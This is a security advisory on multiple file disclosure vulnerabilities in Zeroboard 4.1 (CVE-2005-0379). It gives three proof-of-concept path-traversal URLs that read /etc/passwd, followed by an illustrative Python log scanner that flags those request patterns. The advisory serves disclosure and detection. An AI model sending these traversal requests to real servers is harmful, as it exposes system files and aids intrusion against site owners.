Zeroboard Multiple File Disclosure Vulnerabilities
BID:12257
Info
| Bugtraq ID: | 12257 |
| Class: | Input Validation Error |
| CVE: | CVE-2005-0379 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 13 2005 12:00AM |
| Updated: | Jul 12 2009 09:27AM |
| Credit: | Discovery of this vulnerability is credited to Jeremy Bae at STG Security. |
| Vulnerable: | Zeroboard Zeroboard 4.1 pl5, Zeroboard Zeroboard 4.1 pl4, Zeroboard Zeroboard 4.1 pl3, Zeroboard Zeroboard 4.1 pl2 |
| Not Vulnerable: | |
Discussion
Zeroboard is reportedly affected by multiple file disclosure vulnerabilities. The application fails to properly sanitize user-supplied input to certain parameters. An attacker could exploit these issues to retrieve sensitive files such as /etc/passwd, and that information could then be used to aid further attacks against the underlying system.
Exploit / POC
No exploit is required. The following proofs of concept are available:
http://www.example.com/_head.php?_zb_path=../../../../../etc/passwd%00
http://www.example.com/include/write.php?dir=../../../../../etc/passwd%00
http://www.example.com/outlogin.php?_zb_path=../../../../../etc/passwd%00
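A log check for the request patterns shown above, added here as an example (it is not part of the original advisory or of Zeroboard): it flags access-log entries in which the three listed scripts receive a _zb_path or dir value containing a traversal segment or a null byte. The common/combined log format, the sample lines, and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script name -> parameter, taken from the proof-of-concept URLs in this advisory.
WATCHED = {"_head.php": "_zb_path", "write.php": "dir", "outlogin.php": "_zb_path"}

# Client address and request target from a common/combined-format access-log line
# (assumed format; adjust the pattern to the server's actual log layout).
LINE_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')

def classify(value):
    """Return the reasons a decoded parameter value looks like a file-disclosure attempt."""
    reasons = []
    if ".." in value.replace("\\", "/").split("/"):
        reasons.append("path traversal")
    if "\x00" in value:
        reasons.append("null byte")
    return reasons

def scan(lines):
    """Return a list of (client, script, param, reasons) for each suspicious request."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        try:
            url = urlsplit(target)
        except ValueError:
            continue  # malformed request target
        script = url.path.rsplit("/", 1)[-1]  # match on the script's base name
        param = WATCHED.get(script)
        if param is None:
            continue
        # parse_qsl percent-decodes names and values, so %2e%2e%2f and %00 are normalised.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            reasons = classify(value) if name == param else []
            if reasons:
                findings.append((client, script, param, reasons))
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Jan/2005:10:00:00 +0000] "GET /_head.php?_zb_path=../../../../../etc/passwd%00 HTTP/1.1" 200 1532',
    '192.0.2.11 - - [13/Jan/2005:10:00:05 +0000] "GET /include/write.php?dir=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 977',
    '192.0.2.12 - - [13/Jan/2005:10:00:09 +0000] "GET /include/write.php?dir=upload HTTP/1.1" 200 4410',
    '192.0.2.13 - - [13/Jan/2005:10:00:12 +0000] "GET /index.php?id=free HTTP/1.1" 200 8120',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```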
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].